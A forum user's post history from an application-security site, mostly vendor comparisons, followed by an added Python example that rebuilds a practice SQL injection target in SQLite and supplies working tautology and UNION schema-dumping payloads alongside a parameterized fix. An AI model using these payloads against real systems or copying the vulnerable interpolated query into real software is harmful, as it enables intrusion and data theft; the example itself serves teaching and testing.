This is a place for us to start seriously talking about vendors. Who's great, who's not, what's it cost, how does it relate to their competitors and would we buy it? A place to talk about snakeoil, and brilliant products alike. Marketing fluff is forbidden. 

Results 1 - 15 of 15
4 years ago
br0kan
Here is a good mapping of the WASC Threat Classification v2.0 to the 2010 OWASP Top Ten Vulnerabilities as well. http://2.bp.blogspot.com/_JdybrokZBAk/S0Nt5DVYHWI/AAAAAAAABvU/HXQSzzoRJu0/s1600-h/WASC.png
Forum: News and Links
4 years ago
br0kan
Well, you've got a lot of options here if you're willing to pay. Here are a few (in no particular order):
1. IBM Rational AppScan (multiple versions)
2. HP WebInspect (multiple versions)
3. Cenzic Hailstorm (multiple versions)
4. Acunetix WVS
5. NT Objectives NTOspider
6. nStalker Enterprise Edition
7. Burp Proxy
If I were you I would also strongly consider WhiteHat Sentinel, despite
Forum: Vendor Talk
4 years ago
br0kan
I know the NetScaler Web App Firewall fairly well. It's a quality WAF; it's very similar to F5's BIG-IP Application Security Module, as it adds on to NetScaler much the same way that ASM adds onto BIG-IP. Imperva has a more complete model with DB protection on top of just the WAF. What are you looking to use it for?
Forum: Vendor Talk
5 years ago
br0kan
The HP AppSec group (*cough* SPI Dynamics) released a Flash app automated vuln scanner last week. It's not a bad tool. It basically pulls down the Flash SWF file, then it more or less reverse engineers the file before finally performing source code analysis on the disassembled code. Basically it combines Flasm with something like RATS. It's a lot simpler than it sounds. You can dow
Forum: News and Links
5 years ago
br0kan
Does anybody have any thoughts on Fortify vs. Ounce vs. Klocwork vs. Coverity? Preferred choice?
Forum: Vendor Talk
5 years ago
br0kan
I think you need to be a little more specific. What exactly are you trying to accomplish? If nothing in particular, then take a hammer and hit the router as hard as you can for 10 minutes. This will accomplish a very effective denial of service.
Forum: Networking
5 years ago
br0kan
Thanks... I'm still wondering exactly what that means when they say they "decrypt" the document though. Does that mean that PDF encryption uses weak keys? Or does that mean that when you put the PDF document into hex there are a few areas that you need to tweak? I don't really want to mess with it too much though (isn't that what Dimitri went to jail for?). I'm just curious. Thanks for th
Forum: Networking
5 years ago
br0kan
This topic didn't really fit anywhere and it is somewhat of a tangent. Regardless, I was wondering if anyone could explain how/why PDF password removal is possible in some cases. I know there are a multitude of tools out there to do it and understand that it is easy to do. What I am curious about is what exactly it is that those tools are doing. Also I'm not interested in anything that has t
Forum: Networking
5 years ago
br0kan
Yeah, I used eEye Retina about 4 years ago but ran into some problems when I tried to roll it out as an enterprise solution. REM was pretty buggy at the time, but they made some pretty significant changes, so that's not really an issue anymore, I don't think, but I wanted to get others' thoughts on it. Has anyone used the eEye web app product?
Forum: Vendor Talk
5 years ago
br0kan
Sorry I am seeing this posting late. Did you get these answers? If not, I have them but will probably have to give them over E-mail/phone.
Forum: Vendor Talk
5 years ago
br0kan
Interestingly enough, I just did an assessment of their product. I actually really liked it. It was pretty simple to install as a desktop solution, and I agree the interface was pretty slick; it would work well from a SaaS perspective. From a desktop/server perspective it was pretty nice. I've lost a lot of faith in Nessus lately, as I've had some problems with it as of late. I also enjoy O
Forum: Vendor Talk
6 years ago
br0kan
I've been using Trend for a while now and really like it. I think that running any AV is going to have issues that it catches and misses. In fact, AV is hardly even close to my primary defense mechanism when it comes to issues. It's more like the Alamo for me. It's a line of defense, but I know it's eventually going to fall if tested too hard. Regardless, if you are trying to run a personal bak
Forum: Vendor Talk
6 years ago
br0kan
Has anyone been able to get the PoC code working that's listed as an overflow on Milw0rm? It's an overflow in the TITLE tag, so that it is supposed to run calc.exe when you click Save As. Doesn't seem to work for me though, and I'm not 100% sure why.
Forum: News and Links
6 years ago
br0kan
So I was given a practice application that I'm having problems SQL injecting the search query of. I'll be honest, I'm not great with SQL and I regularly mess up the syntax. The code is as follows: $sql = "SELECT alpha, bravo, charlie, delta FROM thedb WHERE '$query' IN (alpha, bravo, charlie)"; I know that I can inject it... I just can't get the syntax right for some reason... can someone help
Forum: SQL and Code Injection
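As an added example (not from the thread or the practice application), the query from the post above is recreated here in Python against an in-memory SQLite table so the injection can be tried offline. The table name and columns come from the post; the row contents are constructed sample data, the payloads are ordinary string-breakout and UNION techniques, and the "safe" variant is simply the parameterized form of the same statement. In MySQL the same payloads apply, since IN binds tighter than OR there too and `-- ` (with the trailing space) is a valid comment.

```python
import sqlite3

# Constructed sample rows for the post's "thedb" table (assumption: four TEXT columns).
ROWS = [
    ("apple", "red", "fruit", "secret-1"),
    ("beet", "purple", "root", "secret-2"),
    ("carrot", "orange", "root", "secret-3"),
]


def make_db():
    """Build an in-memory SQLite database with the post's table layout."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE thedb (alpha TEXT, bravo TEXT, charlie TEXT, delta TEXT)")
    conn.executemany("INSERT INTO thedb VALUES (?, ?, ?, ?)", ROWS)
    return conn


def render_vulnerable_sql(query):
    """Reproduce the PHP string interpolation: $query is pasted inside single quotes."""
    return (
        "SELECT alpha, bravo, charlie, delta FROM thedb "
        f"WHERE '{query}' IN (alpha, bravo, charlie)"
    )


def vulnerable_search(conn, query):
    """The search as written in the post: attacker input becomes part of the SQL text."""
    return conn.execute(render_vulnerable_sql(query)).fetchall()


def safe_search(conn, query):
    """Same statement with a bound parameter; the input can never change the SQL grammar."""
    sql = "SELECT alpha, bravo, charlie, delta FROM thedb WHERE ? IN (alpha, bravo, charlie)"
    return conn.execute(sql, (query,)).fetchall()


# Payload 1: close the string literal and add an always-true condition.
# Resulting WHERE clause: '' OR 1=1 OR '' IN (alpha, bravo, charlie)
# IN binds tighter than OR, so this is ('' OR 1=1 OR ('' IN (...))) -> every row.
TAUTOLOGY_PAYLOAD = "' OR 1=1 OR '"

# Payload 2: close the IN list early, append a UNION with four columns (to match
# the original SELECT), and comment out the rest of the original WHERE clause.
# sqlite_master is SQLite's schema table; the equivalent in MySQL would be
# information_schema (assumption: the practice app's backend is not known).
SCHEMA_PAYLOAD = "x' IN (alpha) UNION SELECT name, sql, 'x', 'x' FROM sqlite_master -- "


if __name__ == "__main__":
    conn = make_db()
    for label, payload in (("tautology", TAUTOLOGY_PAYLOAD), ("schema", SCHEMA_PAYLOAD)):
        print(label, "->", render_vulnerable_sql(payload))
        for row in vulnerable_search(conn, payload):
            print("   ", row)
        print("   parameterized:", safe_search(conn, payload))
```

Running the block prints the exact statement each payload produces, which is usually the quickest way to debug a payload whose syntax "almost" works: the original `IN (alpha, bravo, charlie)` tail is still present after your input, so either keep the parentheses balanced (payload 1) or comment the tail out (payload 2).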
6 years ago
br0kan
Hey all
I work as a security analyst who assesses and determines application security risks. I also get to work a lot with the application security vendors...so I have some insight. But I'm mostly hoping to get everyone else's.
Forum: Intro